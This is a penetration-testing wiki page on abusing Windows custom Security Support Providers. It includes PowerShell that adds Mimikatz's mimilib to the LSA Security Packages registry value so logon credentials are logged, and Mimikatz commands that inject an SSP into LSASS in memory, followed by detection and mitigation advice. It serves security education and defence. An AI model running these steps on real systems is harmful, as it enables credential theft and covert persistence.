custom-ssp.md (3797B)
1 --- 2 title: "Custom Security Support Providers" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/active-directory-methodology/custom-ssp.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/custom-ssp.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Custom Security Support Providers 14 15 [Security Support Providers (SSPs)](../authentication-credentials-uac-and-efs/index.html#security-support-provider-interface-sspi) are DLL-based security packages loaded by the Local Security Authority (LSA). Windows registers custom SSP/AP DLLs through the `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages` `REG_MULTI_SZ` value and loads registered packages when the system starts.<sup>[[1]](#references)</sup> 16 17 Because SSPs run in LSA and can receive credentials, adversaries may abuse a malicious package for credential access and persistence. MITRE tracks this behavior as T1547.005.<sup>[[2]](#references)</sup> 18 19 ## Mimikatz `mimilib` 20 21 Mimikatz includes `mimilib.dll`, which implements an SSP that records credentials handled after it is loaded. In an authorized lab, place the DLL that matches the target architecture in `C:\Windows\System32`, then inspect the current package list before changing it.<sup>[[2]](#references)[[3]](#references)</sup> 22 23 ```powershell 24 $lsaPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' 25 $packages = (Get-ItemProperty -Path $lsaPath -Name 'Security Packages').'Security Packages' 26 $packages 27 ``` 28 29 A typical existing value can contain packages such as `kerberos`, `msv1_0`, `schannel`, `wdigest`, `tspkg`, and `pku2u`. Preserve every existing entry when adding the custom package.<sup>[[1]](#references)</sup> 30 31 Append `mimilib` without replacing the existing packages: 32 33 ```powershell 34 if ($packages -notcontains 'mimilib') { 35 Set-ItemProperty -Path $lsaPath -Name 'Security Packages' -Value ($packages + 'mimilib') 36 } 37 ``` 38 39 After a reboot, the package is loaded into LSA and subsequent captured credentials are written to `C:\Windows\System32\kiwissp.log` by this implementation.<sup>[[2]](#references)[[3]](#references)</sup> 40 41 ## In-memory Loading 42 43 Mimikatz can also inject its SSP implementation into the current LSASS process:<sup>[[3]](#references)</sup> 44 45 ```text 46 privilege::debug 47 misc::memssp 48 ``` 49 50 This method does not persist across a reboot.<sup>[[2]](#references)[[3]](#references)</sup> 51 52 ## Detection and Mitigation 53 54 Monitor changes to `...\Lsa\Security Packages` and unexpected DLL loads into `lsass.exe`. Security event 4657 records a registry **value** modification only when the relevant Audit Registry policy and SACL are configured.<sup>[[2]](#references)[[4]](#references)</sup> 55 56 Where compatible, enable added LSA protection and investigate unsigned or unexpected SSP DLLs. Microsoft documents LSA protection specifically as a control against code injection that could compromise credentials.<sup>[[5]](#references)</sup> 57 58 ## References 59 60 - [1] [Microsoft Learn - Registering SSP/AP DLLs](https://learn.microsoft.com/en-us/windows/win32/secauthn/registering-ssp-ap-dlls) 61 - [2] [MITRE ATT&CK T1547.005 - Security Support Provider](https://attack.mitre.org/techniques/T1547/005/) 62 - [3] [Mimikatz repository - `mimilib`](https://github.com/gentilkiwi/mimikatz/tree/master/mimilib) 63 - [4] [Microsoft Learn - Security event 4657](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4657) 64 - [5] [Microsoft Learn - Configure added LSA protection](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection)